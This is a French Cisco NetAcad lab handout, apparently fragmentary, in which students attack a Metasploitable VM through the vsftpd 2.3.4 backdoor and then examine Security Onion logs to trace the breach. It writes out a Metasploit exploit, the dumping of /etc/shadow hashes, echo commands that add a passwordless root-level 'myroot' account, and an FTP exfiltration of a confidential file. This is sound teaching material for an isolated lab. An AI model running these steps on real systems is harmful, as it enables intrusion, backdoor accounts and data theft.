Académique Documents
Professionnel Documents
Culture Documents
Objectifs
Au cours de ces travaux pratiques, vous allez passer en revue les journaux documentant une faille afin de
déterminer les hôtes et le fichier compromis.
Partie 1 : Préparation de l'environnement virtuel
Partie 2 : Reconnaissance
Partie 3 : Exploitation
Partie 4 : Infiltration
Partie 5 : Examen des journaux
Contexte/scénario
Le quintuplé est utilisé par les administrateurs IT afin d'identifier les conditions requises pour créer un
environnement de réseau opérationnel et sécurisé. Les composants de ce quintuplé incluent une adresse IP
et un numéro de port sources, une adresse IP et un numéro de port cibles, ainsi que le protocole utilisé.
Au cours de ces travaux pratiques, vous allez exploiter un serveur vulnérable à l'aide d'exploits connus. Vous
passerez en revue les journaux afin de déterminer les hôtes et le fichier compromis.
Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 1 sur 20 www.netacad.com
Travaux pratiques – Isoler un hôte compromis en utilisant un quintuplé
Ressources requises
Ordinateur hôte avec au moins 8 Go de RAM et 35 Go d'espace libre
Dernière version d'Oracle VirtualBox
Connexion Internet
Quatre machines virtuelles
mémoire
Machine virtuelle vive (RAM) Espace disque Nom d'utilisateur Mot de passe
c. Lancez les machines virtuelles CyberOps, Kali, Metasploitable et Security Onion et connectez-vous-y.
d. Sur le poste de travail virtuel CyberOps, ouvrez un terminal et configurez le réseau en exécutant le script
configure_as_static.sh.
Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 2 sur 20 www.netacad.com
Travaux pratiques – Isoler un hôte compromis en utilisant un quintuplé
Comme le script nécessite des privilèges de super-utilisateur, saisissez le mot de passe correspondant à
l'utilisateur analyst.
[analyst@secOps~]$ sudo ./lab.support.files/scripts/configure_as_static.sh
[sudo] password for analyst:
Configuration de la carte réseau :
IP : 192.168.0.11/24
GW : 192.168.0.1
Configuration IP réussie.
[analyst@secOps ~]$
e. Sur la machine virtuelle Security Onion, faites un clic droit sur Desktop > Open Terminal Here.
Saisissez la commande sudo service nsm status pour vérifier que tous les serveurs et les capteurs sont
prêts. Ce processus peut prendre quelques instants. Si certains services signalent un FAIL, répétez la
commande jusqu'à ce que tous les statuts indiquent OK avant de passer à la partie suivante.
analyst@SecOnion:~/Desktop$ sudo service nsm status
Status: securityonion
* sguil server [ OK ]
Status: HIDS
* ossec_agent (sguil) [ OK ]
Status: Bro
Name Type Host Status Pid Started
manager manager localhost running 5577 26 Jun 10:04:27
proxy proxy localhost running 5772 26 Jun 10:04:29
seconion-eth0-1 worker localhost running 6245 26 Jun 10:04:33
seconion-eth1-1 worker localhost running 6247 26 Jun 10:04:33
seconion-eth2-1 worker localhost running 6246 26 Jun 10:04:33
Status : seconion-eth0
* netsniff-ng (full packet data) [ OK ]
* pcap_agent (sguil) [ OK ]
* snort_agent-1 (sguil) [ OK ]
* snort-1 (alert data) [ OK ]
* barnyard2-1 (spooler, unified2 format) [ OK ]
<output omitted>
Partie 2 : Reconnaissance
Dans cette partie, vous allez utiliser nmap pour déterminer si la machine virtuelle Metasploitable possède une
vulnérabilité associée à la version 2.3.4 de vsftpd.
a. Sur la machine virtuelle Security Onion, saisissez date pour afficher la date et l'heure.
analyst@SecOnion:~/Desktop$ date
Enregistrez la date et l'heure.
____________________________________________________________________________________
b. Sur la machine virtuelle Kali, effectuez un clic droit sur le Bureau, puis sélectionnez Open Terminal.
c. Avec les options nmap, vous allez utiliser un script pour tester une vulnérabilité FTP sur la machine
virtuelle Metasploitable pour 209.165.200.235. Entrez la commande suivante :
root@kali:~# nmap --script ftp-vsftpd-backdoor 209.165.200.235 –-reason >
ftpd.txt
Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 3 sur 20 www.netacad.com
Travaux pratiques – Isoler un hôte compromis en utilisant un quintuplé
Les résultats peuvent être redirigés et enregistrés dans un fichier texte ftpd.txt. Ce processus peut
prendre quelques instants.
d. Lorsque l'invite s'affiche à nouveau, ouvrez le fichier de texte contenant les résultats nmap.
root@kali:~# cat ftpd.txt
Le résultat indique la vulnérabilité vsftpd et les autres ports ouverts détectés par nmap sur la machine
virtuelle Metasploitable. Au cours de ces travaux pratiques, vous allez exploiter la vulnérabilité du port 21.
Starting Nmap 7.40 ( https://nmap.org ) at 2017-07-11 11:34 EDT
Nmap scan report for 209.165.200.235
Host is up, received echo-reply ttl 63 (0.0011s latency).
Not shown: 977 closed ports
Reason: 977 resets
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack ttl 63
| ftp-vsftpd-backdoor:
| VULNERABLE:
| vsFTPd version 2.3.4 backdoor
|tate: VULNERABLE (Exploitable)
|ID : OSVDB:73573 CVE:CVE-2011-2523
|vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04.
|Disclosure date: 2011-07-03
|Exploit results:
|Shell command: id
|Results: uid=0(root) gid=0(root)
|References:
|http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
|https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523
|http://osvdb.org/73573
<output omitted>
Partie 3 : Exploitation
Maintenant que vous avez déterminé que vous pouvez obtenir un accès root à la machine virtuelle
Metasploitable, vous allez exploiter la vulnérabilité vsftp pour prendre le contrôle de la machine virtuelle
Metasploitable. Vous allez compromettre le fichier /etc/shadow pour pouvoir accéder à d'autres hôtes du
réseau.
Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 4 sur 20 www.netacad.com
Travaux pratiques – Isoler un hôte compromis en utilisant un quintuplé
[!] Module database cache not built yet, using slow search
Matching Modules
================
c. L'exploit a été trouvé. Saisissez la commande suivante à l'invite pour utiliser l'exploit de porte dérobée
vsftp.
msf > use exploit/unix/ftp/vsftpd_234_backdoor
d. À l'invite de l'exploit, indiquez la machine virtuelle Metasploitable comme hôte cible.
msf exploit(vsftpd_234_backdoor) > set rhost 209.165.200.235
rhost => 209.165.200.235
e. Vérifiez la configuration de l'exploit. Saisissez show options à l'invite.
msf exploit(vsftpd_234_backdoor) > show options
Exploit target:
Id Name-- ----
0 A utomatic
Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 5 sur 20 www.netacad.com
Travaux pratiques – Isoler un hôte compromis en utilisant un quintuplé
whoami
Quel est le nom d'utilisateurs actuel ? __________________________________
c. Saisissez hostname pour vérifier le nom de l'hôte.
hostname
Quel est le nom d'hôte ? _______________________________________
d. L'adresse IP de la machine virtuelle Metasploit est 209.165.200.235. Saisissez ifconfig pour vérifier
l'adresse IP de l'hôte actuel.
ifconfig
eth0 Link encap:Ethernet HWaddr 08:00:27:15:91:86
inet addr:209.165.200.235 Bcast:209.165.200.255 Mask:255.255.255.224
inet6 addr: fe80::a00:27ff:fe15:9186/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:78058 errors:2 dropped:0 overruns:0 frame:0
TX packets:195672 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:11803523 (11.2 MB) TX bytes:91415071 (87.1 MB)
Interrupt:10 Base address:0xd020
e. Pour obtenir le contrôle total de la machine virtuelle Metasploitable, commencez par afficher le contenu
du fichier /etc/shadow. Le fichier /etc/shadow stocke les informations de mot de passe dans un format
chiffré pour les comptes du système, ainsi que des informations facultatives concernant leur ancienneté.
Saisissez la commande cat /etc/shadow pour afficher le contenu.
cat /etc/shadow
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
bin:*:14684:0:99999:7:::
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
sync:*:14684:0:99999:7:::
games:*:14684:0:99999:7:::
man:*:14684:0:99999:7:::
<some output omitted>
mysql:!:14685:0:99999:7:::
tomcat55:*:14691:0:99999:7:::
distccd:*:14698:0:99999:7:::
user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:14699:0:99999:7:::
service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:14715:0:99999:7:::
telnetd:*:14715:0:99999:7:::
proftpd:!:14727:0:99999:7:::
Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 6 sur 20 www.netacad.com
Travaux pratiques – Isoler un hôte compromis en utilisant un quintuplé
statd:*:15474:0:99999:7:::
analyst:$1$uvEqE7eT$x6gczc318aD6mhxOFZqXE.:17338:0:99999:7:::
f. Mettez en surbrillance le contenu de /etc/shadow, puis effectuez un clic droit sur le contenu mis en
surbrillance et sélectionnez Copy.
g. Ouvrez un nouveau terminal sur la machine virtuelle Kali et lancez l'éditeur de texte nano. Saisissez
nano /root/shadow.txt à l'invite.
root@kali:~# nano /root/shadow.txt
h. Effectuez un clic droit sur l'espace vide dans nano et sélectionnez Paste. Après avoir collé le contenu,
supprimez toutes les lignes vides dans la partie inférieure, si nécessaire. Saisissez Ctl-X pour enregistrer
vos modifications et quitter nano. Appuyez sur y lorsque vous êtes invité à enregistrer le fichier et à
accepter le nom de fichier shadow.txt.
Cette opération enregistre le fichier /root/shadow.txt, qui sera utilisé dans une étape ultérieure avec
John the Ripper pour pirater les mots de passe de certains des identifiants afin de pouvoir accéder au
système à distance via SSH.
i. Sur le même terminal, saisissez la commande cat et grep pour afficher uniquement les informations pour
l'utilisateur root.
root@kali@~# cat /root/shadow.txt | grep root
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
Notez que le signe deux-points (:) sépare chaque ligne en 9 champs. En utilisant le compte utilisateur
racine à titre d'exemple, root est l'identifiant de connexion et $1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid. est
le mot de passe chiffré. Les 6 champs suivants définissent les configurations du mot de passe, comme la
date de dernière modification, l'ancienneté minimale et maximale du mot de passe et sa date d'expiration.
Le dernier champ est réservé à un usage ultérieur.
Pour en savoir plus sur le fichier /etc/shadow, saisissez man shadow à l'invite d'un terminal.
j. Retournez sur le terminal Metasploit Framework sur la machine virtuelle Kali. Ajoutez un nouvel utilisateur
myroot à la machine virtuelle Metasploitable. Cet utilisateur aura les mêmes configurations de mot de
passe que l'utilisateur root.
Lorsque vous le créez, utilisez 9 champs identiques à ceux de l'utilisateur root, mais supprimez le mot de
passe chiffré associé à l'utilisateur root et laissez ce champ vide. Lorsque le champ de mot de passe est
vide, aucun mot de passe n'est nécessaire pour ouvrir une session en tant qu'utilisateur myroot.
La commande echo permet d'ajouter une ligne pour insérer le nouvel utilisateur myroot au fichier
/etc/shadow.
Remarque : assurez-vous d'utiliser deux signes « supérieur à » (>). Dans le cas contraire, vous
écraserez le fichier /etc/shadow actif.
echo "myroot::14747:0:99999:7:::" >> /etc/shadow
k. Vérifiez que vous avez ajouté le nouvel utilisateur myroot à /etc/shadow.
cat /etc/shadow
<output omitted>
myroot::14747:0:99999:7:::
Pourquoi fallait-il copier le contenu du fichier /etc/shadow dans un nouveau fichier texte sur la machine
virtuelle Kali ?
Indice : que se passerait-il si vous saisissiez cat /etc/shadow > /root/shadow.txt dans la console
Metasploit Framework ?
____________________________________________________________________________________
Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 7 sur 20 www.netacad.com
Travaux pratiques – Isoler un hôte compromis en utilisant un quintuplé
l. Pour permettre à l'utilisateur myroot d'ouvrir une session avec des privilèges élevés, ajoutez l'utilisateur
myroot avec le même ID utilisateur (UID), le même ID de groupe (GID), la même description, le même
répertoire de base et le même shell de connexion au fichier /etc/passwd que l'utilisateur root. Le signe
deux-points (:) sépare les champs tandis que le x dans le second champ représente le mot de passe de
l'utilisateur. Le mot de passe chiffré se trouve dans le fichier /etc/shadow du même utilisateur.
Retournez dans la fenêtre du terminal de connexion à distance Metasploitable, puis saisissez la
commande cat pour afficher les informations de root.
cat /etc/passwd | grep root
root:x:0:0:root:/root:/bin/bash
m. Utilisez la commande echo suivante pour ajouter les paramètres de myroot à /etc/password.
Remarque : assurez-vous de saisir deux signes « supérieur à » (>) pour éviter d'écraser le fichier
/etc/passwd actuel.
echo "myroot:x:0:0:root:/root:/bin/bash" >> /etc/passwd
Pour en savoir plus sur le fichier /etc/passwd, saisissez man 5 passwd à l'invite du terminal.
n. Vérifiez que vous avez ajouté le nouvel utilisateur myroot à /etc/passwd.
cat /etc/passwd
<output omitted>
myroot:x:0:0:root:/root:/bin/bash
Avec un accès root, l'utilisateur myroot a le contrôle total de la machine virtuelle Metasploitable.
o. Saisissez exit une fois terminé.
exit
[*] 209.165.200.235 - Command shell session 1 closed. Reason: Died from EOFError
p. Appuyez sur Entrée et saisissez quit pour quitter la console Metasploit Framework.
Partie 4 : Infiltration
Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 8 sur 20 www.netacad.com
Travaux pratiques – Isoler un hôte compromis en utilisant un quintuplé
Après avoir craqué le mot de passe de l'utilisateur analyst, vous pouvez accéder à Metasploitable via
SSH avec l'identifiant de connexion analyst.
Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 9 sur 20 www.netacad.com
Travaux pratiques – Isoler un hôte compromis en utilisant un quintuplé
Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 10 sur 20 www.netacad.com
Travaux pratiques – Isoler un hôte compromis en utilisant un quintuplé
passe qui a été piraté au cours d'une étape précédente. Vous allez maintenant accéder à un fichier
confidentiel et en exfiltrer le contenu.
a. Vérifiez que vous êtes dans le répertoire de base de l'utilisateur « analyst ». Changez de répertoire en
accédant à lab.support.files.
[analyst@secOps ~]$ cd lab.support.files
b. Répertoriez les fichiers qui se trouvent dans le répertoire. Vérifiez que le fichier confidential.txt se trouve
dans le dossier.
c. Établissez une session FTP avec la machine virtuelle Metasploitable. Avec l'utilisateur par défaut
analyst, saisissez cyberops comme mot de passe.
[analyst@secOps lab.support.files]$ ftp 209.165.200.235
Connected to 209.165.200.235.
220 (vsFTPd 2.3.4)
Name (209.165.200.235:analyst): analyst
331 Please specify the password.
Mot de passe :
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
d. Importez le fichier confidential.txt dans la machine virtuelle Metasplolitable. Maintenant, vous avez
accès au fichier et vous pouvez le transférer vers la machine virtuelle Kali, le cas échéant.
ftp> put confidential.txt
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
103 bytes sent in 0.000104 seconds (41.6 kbytes/s)
Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 11 sur 20 www.netacad.com
Travaux pratiques – Isoler un hôte compromis en utilisant un quintuplé
Remarque : vous pouvez copier directement le fichier à partir du poste de travail virtuel CyberOps vers la
machine virtuelle Kali s'il existe un compte utilisateur autre que l'utilisateur root configuré sur la machine
virtuelle Kali. Comme FTP transmet le contenu en texte brut, vous pouvez afficher le contenu dans des
paquets en utilisant Wireshark.
e. Si vous le souhaitez, vous pouvez ouvrir une session dans Metasploitable et supprimer le fichier
confidential.txt du serveur FTP.
root@kali:~# ssh analyst@209.165.200.235
analyst@209.165.200.235's password:
analyst@metasploitable:~$ rm confidential.txt
f. À ce moment, vous pouvez arrêter le poste de travail virtuel CyberOps, ainsi que les machines virtuelles
Metasploitable et Kali.
d. Sélectionnez le message root renvoyé qui est associé à Senor seconion-eth1-1 pour une analyse
ultérieure. Dans la figure ci-dessous, Alert ID 5.2568 et ses événements corrélés sont utilisés. Toutefois,
il est très probable que la valeur Alert ID soit différente.
Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 12 sur 20 www.netacad.com
Travaux pratiques – Isoler un hôte compromis en utilisant un quintuplé
e. Faites un clic droit sur ce nombre sous l'en-tête CNT et sélectionnez View Correlated Events.
f. Dans le nouvel onglet, faites un clic droit sur Alert ID à la recherche de l'une des alertes GPL
ATTACK_RESPONSE id check returned root, puis sélectionnez Transcript. L'ID d'alerte 5.2570 est
utilisé dans cet exemple.
g. Examinez les transcriptions de toutes les alertes. La dernière alerte de l'onglet est susceptible d'afficher
les transactions entre les machines virtuelles Kali (à l'origine de l'attaque) et Metasploitable (cible) lors de
l'attaque.
Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 13 sur 20 www.netacad.com
Travaux pratiques – Isoler un hôte compromis en utilisant un quintuplé
b. Pour afficher tous les paquets assemblés dans une conversation TCP, cliquez avec le bouton droit sur
n'importe quel paquet, puis sélectionnez Follow TCP Stream.
Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 14 sur 20 www.netacad.com
Travaux pratiques – Isoler un hôte compromis en utilisant un quintuplé
Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 15 sur 20 www.netacad.com
Travaux pratiques – Isoler un hôte compromis en utilisant un quintuplé
c. Le résultat indique que 209.165.201.17 effectuait une analyse des ports sur 209.165.200.235, la machine
virtuelle Metasploitable. Le hacker a probablement trouvé des vulnérabilités sur la machine virtuelle
Metasploitable afin d'y obtenir l'accès.
d. Si un hacker a compromis Metasploitable, il est important de déterminer l'exploit qui a été utilisé et les
contenus auxquels il a accédé.
Étape 4 : Retournez dans Squil pour effectuer des recherches plus poussées sur
l'attaque.
a. Accédez à Sguil et cliquez sur l'onglet RealTime Events. Localiser les événements ET EXLOIT VSFTPD
Backdoor User Login Smiley. Il est possible que ces événements soient des exploits possibles et ils se
sont produits lors de l'accès root non autorisé. L'ID d'alerte 5.2567 est utilisé dans cet exemple.
b. Faites un clic droit sur l'en-tête CNT et sélectionnez View Correlated Events pour afficher tous les
événements associés. Sélectionnez l'ID alerte qui commence par 5. Cette alerte a recueilli les
informations du capteur sur l'interface seconion-eth1-1.
Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 16 sur 20 www.netacad.com
Travaux pratiques – Isoler un hôte compromis en utilisant un quintuplé
c. Dans le nouvel onglet contenant tous les événements corrélés, faites un clic droit sur l'ID d'alerte et
sélectionnez Transcript pour afficher chaque alerte plus en détail. L'ID d'alerte 5.2569 est utilisé dans cet
exemple. La dernière alerte est susceptible d'afficher la transmission TCP entre le hacker et la victime.
d. Vous pouvez également cliquez sur l'ID d'alerte et sélectionner Wireshark pour examiner et enregistrer le
fichier pcap et le flux TCP.
c. Quel fichier a été transféré par FTP à 209.165.200.235 ? Quel compte a été utilisé pour transférer le
fichier ?
____________________________________________________________________________________
Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 17 sur 20 www.netacad.com
Travaux pratiques – Isoler un hôte compromis en utilisant un quintuplé
d. Cliquez sur info pour afficher les transactions dans le dernier enregistrement. Le champ reply_msg
indique qu'il s'agit de la dernière entrée pour le transfert du fichier confidential.txt. Cliquez sur Plugin >
getPcap. À l'invite, saisissez le nom d'utilisateur analyst et le mot de passe cyberops. Cliquez sur
Submit si nécessaire. CapMe est une interface web qui vous permet d'obtenir une transcription de pcap
et de télécharger ce fichier.
La transcription de pcap est restituée à l'aide de tcpflow, et cette page fournit également le lien pour
accéder au fichier pcap.
e. Pour déterminer le contenu du fichier qui a été compromis, ouvrez ELSA en double-cliquant sur l'icône
située sur le Bureau afin d'ouvrir un nouvel onglet et d'effectuer une nouvelle recherche.
Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 18 sur 20 www.netacad.com
Travaux pratiques – Isoler un hôte compromis en utilisant un quintuplé
f. Développez FTP et cliquez sur FTP Data. Cliquez sur l'un des liens Info et sélectionnez getPcap dans le
menu déroulant afin de déterminer le contenu du fichier volé.
g. Le résultat affiche le contenu du fichier confidential.txt qui a été transféré sur le serveur FTP.
Étape 6 : Nettoyage
Arrêtez toutes les machines virtuelles lorsque vous avez terminé.
Remarques générales
Au cours de ces travaux pratiques, vous avez utilisé une vulnérabilité pour accéder à des informations non
autorisées et vous avez passé en revue les journaux comme un analyste en cybersécurité. Vous allez
maintenant présenter vos conclusions.
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 19 sur 20 www.netacad.com
Travaux pratiques – Isoler un hôte compromis en utilisant un quintuplé
_______________________________________________________________________________________
Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 20 sur 20 www.netacad.com